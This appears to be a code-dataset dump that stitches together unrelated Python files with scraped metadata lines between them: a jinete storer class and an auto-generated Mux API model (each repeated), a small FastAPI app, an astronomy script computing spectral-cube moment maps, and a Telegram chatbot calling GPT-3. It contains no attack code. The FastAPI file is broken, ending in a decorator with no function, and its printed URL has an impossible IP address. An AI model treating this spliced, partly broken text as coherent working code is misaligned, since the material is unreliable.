<filename>jinete/storers/sets.py """The set of definitions to use more than one storer at the same time.""" from __future__ import ( annotations, ) import logging from typing import ( TYPE_CHECKING, ) from .abc import ( Storer, ) if TYPE_CHECKING: from typing import ( Set, Type, ) logger = logging.getLogger(__name__) class StorerSet(Storer): """Store a resulting solution trough multiple storers. This implementation is an intermediate tool to combine multiple storers. """ def __init__(self, storer_cls_set: Set[Type[Storer]], *args, **kwargs): """Construct a new object instance. :param storer_cls_set: The storer classes to be used to store the problem solution. :param args: Additional positional arguments. :param kwargs: Additional named arguments. """ super().__init__(*args, **kwargs) self.storer_cls_set = storer_cls_set self.args = args self.kwargs = kwargs def store(self) -> None: """Perform a storage process.""" for storer_cls in self.storer_cls_set: name = getattr(storer_cls, "__name__", None) logger.info(f'Storing result with "{name}"...') storer = storer_cls(*self.args, **self.kwargs) storer.store()
<filename>jinete/storers/sets.py """The set of definitions to use more than one storer at the same time.""" from __future__ import ( annotations, ) import logging from typing import ( TYPE_CHECKING, ) from .abc import ( Storer, ) if TYPE_CHECKING: from typing import ( Set, Type, ) logger = logging.getLogger(__name__) class StorerSet(Storer): """Store a resulting solution trough multiple storers. This implementation is an intermediate tool to combine multiple storers. """ def __init__(self, storer_cls_set: Set[Type[Storer]], *args, **kwargs): """Construct a new object instance. :param storer_cls_set: The storer classes to be used to store the problem solution. :param args: Additional positional arguments. :param kwargs: Additional named arguments. """ super().__init__(*args, **kwargs) self.storer_cls_set = storer_cls_set self.args = args self.kwargs = kwargs def store(self) -> None: """Perform a storage process.""" for storer_cls in self.storer_cls_set: name = getattr(storer_cls, "__name__", None) logger.info(f'Storing result with "{name}"...') storer = storer_cls(*self.args, **self.kwargs) storer.store()
en
0.83209
The set of definitions to use more than one storer at the same time. Store a resulting solution trough multiple storers. This implementation is an intermediate tool to combine multiple storers. Construct a new object instance. :param storer_cls_set: The storer classes to be used to store the problem solution. :param args: Additional positional arguments. :param kwargs: Additional named arguments. Perform a storage process.
2.950994
3
mux_python/models/referrer_domain_restriction.py
ryan-alley/mux-python
0
6623597
# coding: utf-8 """ Mux API Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before. # noqa: E501 The version of the OpenAPI document: v1 Contact: <EMAIL> Generated by: https://openapi-generator.tech """ import inspect import pprint import re # noqa: F401 import six from mux_python.configuration import Configuration class ReferrerDomainRestriction(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'allowed_domains': 'list[str]', 'allow_no_referrer': 'bool' } attribute_map = { 'allowed_domains': 'allowed_domains', 'allow_no_referrer': 'allow_no_referrer' } def __init__(self, allowed_domains=None, allow_no_referrer=False, local_vars_configuration=None): # noqa: E501 """ReferrerDomainRestriction - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration.get_default_copy() self.local_vars_configuration = local_vars_configuration self._allowed_domains = None self._allow_no_referrer = None self.discriminator = None if allowed_domains is not None: self.allowed_domains = allowed_domains if allow_no_referrer is not None: self.allow_no_referrer = allow_no_referrer @property def allowed_domains(self): """Gets the allowed_domains of this ReferrerDomainRestriction. # noqa: E501 List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :return: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :rtype: list[str] """ return self._allowed_domains @allowed_domains.setter def allowed_domains(self, allowed_domains): """Sets the allowed_domains of this ReferrerDomainRestriction. List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :param allowed_domains: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :type allowed_domains: list[str] """ self._allowed_domains = allowed_domains @property def allow_no_referrer(self): """Gets the allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :return: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :rtype: bool """ return self._allow_no_referrer @allow_no_referrer.setter def allow_no_referrer(self, allow_no_referrer): """Sets the allow_no_referrer of this ReferrerDomainRestriction. A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :param allow_no_referrer: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :type allow_no_referrer: bool """ self._allow_no_referrer = allow_no_referrer def to_dict(self, serialize=False): """Returns the model properties as a dict""" result = {} def convert(x): if hasattr(x, "to_dict"): args = inspect.getargspec(x.to_dict).args if len(args) == 1: return x.to_dict() else: return x.to_dict(serialize) else: return x for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) attr = self.attribute_map.get(attr, attr) if serialize else attr if isinstance(value, list): result[attr] = list(map( lambda x: convert(x), value )) elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], convert(item[1])), value.items() )) else: result[attr] = convert(value) return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ReferrerDomainRestriction): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, ReferrerDomainRestriction): return True return self.to_dict() != other.to_dict()
# coding: utf-8 """ Mux API Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before. # noqa: E501 The version of the OpenAPI document: v1 Contact: <EMAIL> Generated by: https://openapi-generator.tech """ import inspect import pprint import re # noqa: F401 import six from mux_python.configuration import Configuration class ReferrerDomainRestriction(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'allowed_domains': 'list[str]', 'allow_no_referrer': 'bool' } attribute_map = { 'allowed_domains': 'allowed_domains', 'allow_no_referrer': 'allow_no_referrer' } def __init__(self, allowed_domains=None, allow_no_referrer=False, local_vars_configuration=None): # noqa: E501 """ReferrerDomainRestriction - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration.get_default_copy() self.local_vars_configuration = local_vars_configuration self._allowed_domains = None self._allow_no_referrer = None self.discriminator = None if allowed_domains is not None: self.allowed_domains = allowed_domains if allow_no_referrer is not None: self.allow_no_referrer = allow_no_referrer @property def allowed_domains(self): """Gets the allowed_domains of this ReferrerDomainRestriction. # noqa: E501 List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :return: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :rtype: list[str] """ return self._allowed_domains @allowed_domains.setter def allowed_domains(self, allowed_domains): """Sets the allowed_domains of this ReferrerDomainRestriction. List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :param allowed_domains: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :type allowed_domains: list[str] """ self._allowed_domains = allowed_domains @property def allow_no_referrer(self): """Gets the allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :return: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :rtype: bool """ return self._allow_no_referrer @allow_no_referrer.setter def allow_no_referrer(self, allow_no_referrer): """Sets the allow_no_referrer of this ReferrerDomainRestriction. A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :param allow_no_referrer: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :type allow_no_referrer: bool """ self._allow_no_referrer = allow_no_referrer def to_dict(self, serialize=False): """Returns the model properties as a dict""" result = {} def convert(x): if hasattr(x, "to_dict"): args = inspect.getargspec(x.to_dict).args if len(args) == 1: return x.to_dict() else: return x.to_dict(serialize) else: return x for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) attr = self.attribute_map.get(attr, attr) if serialize else attr if isinstance(value, list): result[attr] = list(map( lambda x: convert(x), value )) elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], convert(item[1])), value.items() )) else: result[attr] = convert(value) return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ReferrerDomainRestriction): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, ReferrerDomainRestriction): return True return self.to_dict() != other.to_dict()
en
0.652085
# coding: utf-8 Mux API Mux is how developers build online video. This API encompasses both Mux Video and Mux Data functionality to help you build your video-related projects better and faster than ever before. # noqa: E501 The version of the OpenAPI document: v1 Contact: <EMAIL> Generated by: https://openapi-generator.tech # noqa: F401 NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. # noqa: E501 ReferrerDomainRestriction - a model defined in OpenAPI # noqa: E501 Gets the allowed_domains of this ReferrerDomainRestriction. # noqa: E501 List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :return: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :rtype: list[str] Sets the allowed_domains of this ReferrerDomainRestriction. List of domains allowed to play videos. Possible values are * `[]` Empty Array indicates deny video playback requests for all domains * `[\"*\"]` A Single Wildcard `*` entry means allow video playback requests from any domain * `[\"*.example.com\", \"foo.com\"]` A list of up to 10 domains or valid dns-style wildcards # noqa: E501 :param allowed_domains: The allowed_domains of this ReferrerDomainRestriction. # noqa: E501 :type allowed_domains: list[str] Gets the allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :return: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :rtype: bool Sets the allow_no_referrer of this ReferrerDomainRestriction. A boolean to determine whether to allow or deny HTTP requests without `Referer` HTTP request header. Playback requests coming from non-web/native applications like iOS, Android or smart TVs will not have a `Referer` HTTP header. Set this value to `true` to allow these playback requests. # noqa: E501 :param allow_no_referrer: The allow_no_referrer of this ReferrerDomainRestriction. # noqa: E501 :type allow_no_referrer: bool Returns the model properties as a dict Returns the string representation of the model For `print` and `pprint` Returns true if both objects are equal Returns true if both objects are not equal
2.004935
2
main.py
thanapolbig/python_API
0
6623598
<gh_stars>0 from typing import Optional import sqlite3 from fastapi import FastAPI app = FastAPI() print("go to swagger =>> http://1172.16.31.10:8000/docs") @app.get("/") def read_root(): return {"Hello": "World"} @app.get("/items/{item_id}") def read_item(item_id: int, q: Optional[str] = None): return {"item_id": item_id, "q": q} @app.get("/getdata")
from typing import Optional import sqlite3 from fastapi import FastAPI app = FastAPI() print("go to swagger =>> http://1172.16.31.10:8000/docs") @app.get("/") def read_root(): return {"Hello": "World"} @app.get("/items/{item_id}") def read_item(item_id: int, q: Optional[str] = None): return {"item_id": item_id, "q": q} @app.get("/getdata")
none
1
2.665626
3
cube_analysis/moments.py
e-koch/CubeAnalysis
4
6623599
<reponame>e-koch/CubeAnalysis<filename>cube_analysis/moments.py from spectral_cube import SpectralCube from spectral_cube.lower_dimensional_structures import Projection import numpy as np import astropy.units as u from astropy.io import fits from astropy.wcs import WCS from astropy import log from astropy.convolution import Gaussian1DKernel from astropy.utils.console import ProgressBar import os import glob from .feather_cubes import get_channel_chunks from .progressbar import _map_context def _peak_velocity(args): ''' Return the velocity at the peak of a spectrum. ''' spec, kern = args if kern is None: return spec.spectral_axis[np.argmax(spec.value)] else: smooth_spec = spec.spectral_smooth(kern) argmax = np.argmax(smooth_spec.value) return spec.spectral_axis[argmax] def find_peakvelocity(cube_name, mask_name=None, source_mask=None, chunk_size=1e4, smooth_size=None, # in_memory=False, num_cores=1, spectral_slice=slice(None), verbose=False): ''' Calculate the peak velocity surface of a spectral cube ''' # Open the cube to get some properties for the peak velocity # array cube_hdu = fits.open(cube_name, mode='denywrite') shape = cube_hdu[0].shape spat_wcs = WCS(cube_hdu[0].header).celestial vel_unit = u.Unit(cube_hdu[0].header['CUNIT3']) cube_hdu.close() del cube_hdu peakvels = Projection(np.zeros(shape[1:]) * np.NaN, wcs=spat_wcs, unit=vel_unit) # Now read in the source mask if mask_name is not None or source_mask is not None: if source_mask is None: source_mask = fits.getdata(mask_name) source_mask_spatial = source_mask.sum(0) > 0 posns = np.where(source_mask_spatial) else: posns = np.indices(shape[1:]) chunk_size = int(chunk_size) chunk_idx = get_channel_chunks(posns[0].size, chunk_size) if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) else: kern = None for i, chunk in enumerate(chunk_idx): log.info("On chunk {0} of {1}".format(i + 1, len(chunk_idx))) y_posn = posns[0][chunk] x_posn = posns[1][chunk] if verbose: pbar = ProgressBar(y_posn.size) cube = SpectralCube.read(cube_name) if mask_name is not None: cube = cube.with_mask(source_mask) cube = cube[spectral_slice] for j, (y, x) in enumerate(zip(y_posn, x_posn)): peakvels[y, x] = _peak_velocity((cube[:, y, x], kern)) if verbose: pbar.update(j + 1) del cube # if in_memory: # gener = [(cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)] # else: # gener = ((cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)) # with _map_context(num_cores, verbose=verbose) as map: # output = map(_peak_velocity, gener) # del gener # for out, y, x in zip(output, y_posn, x_posn): # peakvels[y, x] = out # peakvels[peakvels == 0.0 * u.m / u.s] = np.NaN * u.m / u.s # Make sure there are no garbage points outside of the cube spectral range cube = SpectralCube.read(cube_name)[spectral_slice] peakvels[peakvels < cube.spectral_extrema[0]] = np.NaN * u.m / u.s peakvels[peakvels > cube.spectral_extrema[1]] = np.NaN * u.m / u.s del cube return peakvels def find_peakvelocity_cube(cube, smooth_size=None, pb_mask=None, num_cores=1, verbose=False, how='cube', spectral_slice=slice(None)): ''' Make peak velocity map with cube operations. ''' if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) parallel = True if num_cores > 1 else False smooth_cube = cube.spectral_smooth(kern, parallel=parallel, num_cores=num_cores) else: smooth_cube = cube argmax_plane = smooth_cube[spectral_slice].argmax(axis=0, how=how) peakvels = cube[spectral_slice].spectral_axis[argmax_plane] if pb_mask is not None: peakvels[~pb_mask] = np.NaN return peakvels def make_moments(cube_name, mask_name, output_folder, freq=None, custom_mask_name=None, num_cores=1, verbose=False, chunk_size=1e4, in_memory=False, smooth_size=None, how='slice', make_peakvels=True, spectral_slice=slice(None)): ''' Create the moment arrays. ''' cube = SpectralCube.read(cube_name) # Load in source mask source_mask = fits.getdata(mask_name) source_mask = source_mask.astype(np.bool) # Allow loading in a custom mask to combine with the signal mask # For cases like M31 where the MW emission needs to be manually flagged if custom_mask_name is not None: custom_mask = fits.getdata(custom_mask_name) custom_mask = custom_mask.astype(np.bool) source_mask = np.logical_and(source_mask, custom_mask) cube = cube.with_mask(source_mask) # Now create the moment 1 and save it. Make a linewidth one too. cube_base_name = os.path.split(cube_name)[-1] log.info(f"Making moment 0 from cube {cube_base_name}") moment0 = cube[spectral_slice].moment0(how=how) moment0_name = "{}.mom0.fits".format(cube_base_name.rstrip(".fits")) moment0.write(os.path.join(output_folder, moment0_name), overwrite=True) log.info(f"Making moment 1 from cube {cube_base_name}") moment1 = cube[spectral_slice].moment1(how=how).astype(np.float32) moment1[moment1 < cube.spectral_extrema[0]] = np.NaN * u.m / u.s moment1[moment1 > cube.spectral_extrema[1]] = np.NaN * u.m / u.s moment1_name = "{}.mom1.fits".format(cube_base_name.rstrip(".fits")) moment1.header["BITPIX"] = -32 moment1.write(os.path.join(output_folder, moment1_name), overwrite=True) log.info(f"Making line width from cube {cube_base_name}") linewidth = cube[spectral_slice].linewidth_sigma(how=how) lwidth_name = "{}.lwidth.fits".format(cube_base_name.rstrip(".fits")) linewidth.write(os.path.join(output_folder, lwidth_name), overwrite=True) # Skewness log.info(f"Making skewness from cube {cube_base_name}") mom3 = cube[spectral_slice].moment(order=3, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness skew = mom3 / linewidth ** 3 skew_name = "{}.skewness.fits".format(cube_base_name.rstrip(".fits")) skew.write(os.path.join(output_folder, skew_name), overwrite=True) # Kurtosis: Uncorrected log.info(f"Making kurtosis from cube {cube_base_name}") mom4 = cube[spectral_slice].moment(order=4, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness # And subtract 3 to correct for Gaussian kurtosis of 3. kurt = (mom4 / linewidth ** 4) - 3 kurt_name = "{}.kurtosis.fits".format(cube_base_name.rstrip(".fits")) kurt.write(os.path.join(output_folder, kurt_name), overwrite=True) # Peak temperature map. And convert to K if in_memory: cube.allow_huge_operations = True log.info(f"Making peak temperature from cube {cube_base_name}") maxima = cube[spectral_slice].max(axis=0, how=how) if freq is not None: if not cube.unit.is_equivalent(u.K): if hasattr(cube, 'beams'): peak_temps = maxima * cube.beams.largest_beam().jtok(freq) elif hasattr(cube, 'beam'): peak_temps = maxima * cube.beam.jtok(freq) else: log.info("No beam object found. Cannot convert to K.") else: peak_temps = maxima peaktemps_name = "{}.peaktemps.fits".format(cube_base_name.rstrip(".fits")) peak_temps.write(os.path.join(output_folder, peaktemps_name), overwrite=True) log.info(f"Making peak velocity from cube {cube_base_name}") if make_peakvels: if in_memory: peakvels = find_peakvelocity_cube(cube[spectral_slice], smooth_size=smooth_size, how=how, num_cores=num_cores, spectral_slice=spectral_slice) else: peakvels = find_peakvelocity(cube_name, mask_name, source_mask=source_mask, chunk_size=chunk_size, smooth_size=smooth_size, spectral_slice=spectral_slice, verbose=verbose) peakvels = peakvels.astype(np.float32) peakvels.header["BITPIX"] = -32 peakvels_name = \ "{}.peakvels.fits".format(cube_base_name.rstrip(".fits")) peakvels.write(os.path.join(output_folder, peakvels_name), overwrite=True) def find_moment_names(path): ''' Given a path, make global variables of the moment names. ''' search_dict = {"Moment0": "mom0", "Moment1": "mom1", "LWidth": "lwidth", "Skewness": "skewness", "Kurtosis": "kurtosis", "PeakTemp": "peaktemps", "PeakVels": "peakvels"} found_dict = {} for filename in glob.glob(os.path.join(path, "*.fits")): for key in search_dict: if search_dict[key] in filename: found_dict[key] = filename search_dict.pop(key) break return found_dict
from spectral_cube import SpectralCube from spectral_cube.lower_dimensional_structures import Projection import numpy as np import astropy.units as u from astropy.io import fits from astropy.wcs import WCS from astropy import log from astropy.convolution import Gaussian1DKernel from astropy.utils.console import ProgressBar import os import glob from .feather_cubes import get_channel_chunks from .progressbar import _map_context def _peak_velocity(args): ''' Return the velocity at the peak of a spectrum. ''' spec, kern = args if kern is None: return spec.spectral_axis[np.argmax(spec.value)] else: smooth_spec = spec.spectral_smooth(kern) argmax = np.argmax(smooth_spec.value) return spec.spectral_axis[argmax] def find_peakvelocity(cube_name, mask_name=None, source_mask=None, chunk_size=1e4, smooth_size=None, # in_memory=False, num_cores=1, spectral_slice=slice(None), verbose=False): ''' Calculate the peak velocity surface of a spectral cube ''' # Open the cube to get some properties for the peak velocity # array cube_hdu = fits.open(cube_name, mode='denywrite') shape = cube_hdu[0].shape spat_wcs = WCS(cube_hdu[0].header).celestial vel_unit = u.Unit(cube_hdu[0].header['CUNIT3']) cube_hdu.close() del cube_hdu peakvels = Projection(np.zeros(shape[1:]) * np.NaN, wcs=spat_wcs, unit=vel_unit) # Now read in the source mask if mask_name is not None or source_mask is not None: if source_mask is None: source_mask = fits.getdata(mask_name) source_mask_spatial = source_mask.sum(0) > 0 posns = np.where(source_mask_spatial) else: posns = np.indices(shape[1:]) chunk_size = int(chunk_size) chunk_idx = get_channel_chunks(posns[0].size, chunk_size) if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) else: kern = None for i, chunk in enumerate(chunk_idx): log.info("On chunk {0} of {1}".format(i + 1, len(chunk_idx))) y_posn = posns[0][chunk] x_posn = posns[1][chunk] if verbose: pbar = ProgressBar(y_posn.size) cube = SpectralCube.read(cube_name) if mask_name is not None: cube = cube.with_mask(source_mask) cube = cube[spectral_slice] for j, (y, x) in enumerate(zip(y_posn, x_posn)): peakvels[y, x] = _peak_velocity((cube[:, y, x], kern)) if verbose: pbar.update(j + 1) del cube # if in_memory: # gener = [(cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)] # else: # gener = ((cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)) # with _map_context(num_cores, verbose=verbose) as map: # output = map(_peak_velocity, gener) # del gener # for out, y, x in zip(output, y_posn, x_posn): # peakvels[y, x] = out # peakvels[peakvels == 0.0 * u.m / u.s] = np.NaN * u.m / u.s # Make sure there are no garbage points outside of the cube spectral range cube = SpectralCube.read(cube_name)[spectral_slice] peakvels[peakvels < cube.spectral_extrema[0]] = np.NaN * u.m / u.s peakvels[peakvels > cube.spectral_extrema[1]] = np.NaN * u.m / u.s del cube return peakvels def find_peakvelocity_cube(cube, smooth_size=None, pb_mask=None, num_cores=1, verbose=False, how='cube', spectral_slice=slice(None)): ''' Make peak velocity map with cube operations. ''' if smooth_size is not None: kern = Gaussian1DKernel(smooth_size) parallel = True if num_cores > 1 else False smooth_cube = cube.spectral_smooth(kern, parallel=parallel, num_cores=num_cores) else: smooth_cube = cube argmax_plane = smooth_cube[spectral_slice].argmax(axis=0, how=how) peakvels = cube[spectral_slice].spectral_axis[argmax_plane] if pb_mask is not None: peakvels[~pb_mask] = np.NaN return peakvels def make_moments(cube_name, mask_name, output_folder, freq=None, custom_mask_name=None, num_cores=1, verbose=False, chunk_size=1e4, in_memory=False, smooth_size=None, how='slice', make_peakvels=True, spectral_slice=slice(None)): ''' Create the moment arrays. ''' cube = SpectralCube.read(cube_name) # Load in source mask source_mask = fits.getdata(mask_name) source_mask = source_mask.astype(np.bool) # Allow loading in a custom mask to combine with the signal mask # For cases like M31 where the MW emission needs to be manually flagged if custom_mask_name is not None: custom_mask = fits.getdata(custom_mask_name) custom_mask = custom_mask.astype(np.bool) source_mask = np.logical_and(source_mask, custom_mask) cube = cube.with_mask(source_mask) # Now create the moment 1 and save it. Make a linewidth one too. cube_base_name = os.path.split(cube_name)[-1] log.info(f"Making moment 0 from cube {cube_base_name}") moment0 = cube[spectral_slice].moment0(how=how) moment0_name = "{}.mom0.fits".format(cube_base_name.rstrip(".fits")) moment0.write(os.path.join(output_folder, moment0_name), overwrite=True) log.info(f"Making moment 1 from cube {cube_base_name}") moment1 = cube[spectral_slice].moment1(how=how).astype(np.float32) moment1[moment1 < cube.spectral_extrema[0]] = np.NaN * u.m / u.s moment1[moment1 > cube.spectral_extrema[1]] = np.NaN * u.m / u.s moment1_name = "{}.mom1.fits".format(cube_base_name.rstrip(".fits")) moment1.header["BITPIX"] = -32 moment1.write(os.path.join(output_folder, moment1_name), overwrite=True) log.info(f"Making line width from cube {cube_base_name}") linewidth = cube[spectral_slice].linewidth_sigma(how=how) lwidth_name = "{}.lwidth.fits".format(cube_base_name.rstrip(".fits")) linewidth.write(os.path.join(output_folder, lwidth_name), overwrite=True) # Skewness log.info(f"Making skewness from cube {cube_base_name}") mom3 = cube[spectral_slice].moment(order=3, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness skew = mom3 / linewidth ** 3 skew_name = "{}.skewness.fits".format(cube_base_name.rstrip(".fits")) skew.write(os.path.join(output_folder, skew_name), overwrite=True) # Kurtosis: Uncorrected log.info(f"Making kurtosis from cube {cube_base_name}") mom4 = cube[spectral_slice].moment(order=4, axis=0, how=how) # Normalize third moment by the linewidth to get the skewness # And subtract 3 to correct for Gaussian kurtosis of 3. kurt = (mom4 / linewidth ** 4) - 3 kurt_name = "{}.kurtosis.fits".format(cube_base_name.rstrip(".fits")) kurt.write(os.path.join(output_folder, kurt_name), overwrite=True) # Peak temperature map. And convert to K if in_memory: cube.allow_huge_operations = True log.info(f"Making peak temperature from cube {cube_base_name}") maxima = cube[spectral_slice].max(axis=0, how=how) if freq is not None: if not cube.unit.is_equivalent(u.K): if hasattr(cube, 'beams'): peak_temps = maxima * cube.beams.largest_beam().jtok(freq) elif hasattr(cube, 'beam'): peak_temps = maxima * cube.beam.jtok(freq) else: log.info("No beam object found. Cannot convert to K.") else: peak_temps = maxima peaktemps_name = "{}.peaktemps.fits".format(cube_base_name.rstrip(".fits")) peak_temps.write(os.path.join(output_folder, peaktemps_name), overwrite=True) log.info(f"Making peak velocity from cube {cube_base_name}") if make_peakvels: if in_memory: peakvels = find_peakvelocity_cube(cube[spectral_slice], smooth_size=smooth_size, how=how, num_cores=num_cores, spectral_slice=spectral_slice) else: peakvels = find_peakvelocity(cube_name, mask_name, source_mask=source_mask, chunk_size=chunk_size, smooth_size=smooth_size, spectral_slice=spectral_slice, verbose=verbose) peakvels = peakvels.astype(np.float32) peakvels.header["BITPIX"] = -32 peakvels_name = \ "{}.peakvels.fits".format(cube_base_name.rstrip(".fits")) peakvels.write(os.path.join(output_folder, peakvels_name), overwrite=True) def find_moment_names(path): ''' Given a path, make global variables of the moment names. ''' search_dict = {"Moment0": "mom0", "Moment1": "mom1", "LWidth": "lwidth", "Skewness": "skewness", "Kurtosis": "kurtosis", "PeakTemp": "peaktemps", "PeakVels": "peakvels"} found_dict = {} for filename in glob.glob(os.path.join(path, "*.fits")): for key in search_dict: if search_dict[key] in filename: found_dict[key] = filename search_dict.pop(key) break return found_dict
en
0.714619
Return the velocity at the peak of a spectrum. # in_memory=False, num_cores=1, Calculate the peak velocity surface of a spectral cube # Open the cube to get some properties for the peak velocity # array # Now read in the source mask # if in_memory: # gener = [(cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)] # else: # gener = ((cube[:, y, x], kern) # for y, x in zip(y_posn, x_posn)) # with _map_context(num_cores, verbose=verbose) as map: # output = map(_peak_velocity, gener) # del gener # for out, y, x in zip(output, y_posn, x_posn): # peakvels[y, x] = out # peakvels[peakvels == 0.0 * u.m / u.s] = np.NaN * u.m / u.s # Make sure there are no garbage points outside of the cube spectral range Make peak velocity map with cube operations. Create the moment arrays. # Load in source mask # Allow loading in a custom mask to combine with the signal mask # For cases like M31 where the MW emission needs to be manually flagged # Now create the moment 1 and save it. Make a linewidth one too. # Skewness # Normalize third moment by the linewidth to get the skewness # Kurtosis: Uncorrected # Normalize third moment by the linewidth to get the skewness # And subtract 3 to correct for Gaussian kurtosis of 3. # Peak temperature map. And convert to K Given a path, make global variables of the moment names.
2.185622
2
src/service.py
wisrovi/chat_telegram_gpt3
0
6623600
<gh_stars>0 # -*- coding: utf-8 -*- # !pip install python-telegram-bot from telegram.ext import (Updater, CommandHandler, MessageHandler, Filters) from config import TOKEN_TELEGRAM as config from gpt3 import getAnswer as gpt3 from files import writeSession as session def start(update, context): context.bot.send_message(update.message.chat_id, "Bienvenido") def mensaje_nocomando(update, context): cid = update.message.chat_id # obtengo el id_usuario question_user = update.message.text # obtengo el mensaje del usuario old_log = session.getLog(cid) # miro si hay un log previo cargado en cache, sino creo el cache para este usuario answer, new_log = gpt3.getAnswer(question_user, old_log) # le pido a la IA una respuesta al comentario del usuario session.writeSession(cid, new_log) # guardo el cache para este usuario update.message.reply_text(answer) # respondo al usuario if __name__=="__main__": print("Chatbot iniciado.") updater = Updater(config.TOKEN_TELEGRAM, use_context=True) dp=updater.dispatcher dp.add_handler(CommandHandler("start", start)) # respuesta al comando /start dp.add_handler(MessageHandler(Filters.text, mensaje_nocomando)) # respuesta a los comentarios del usuario updater.start_polling() updater.idle()
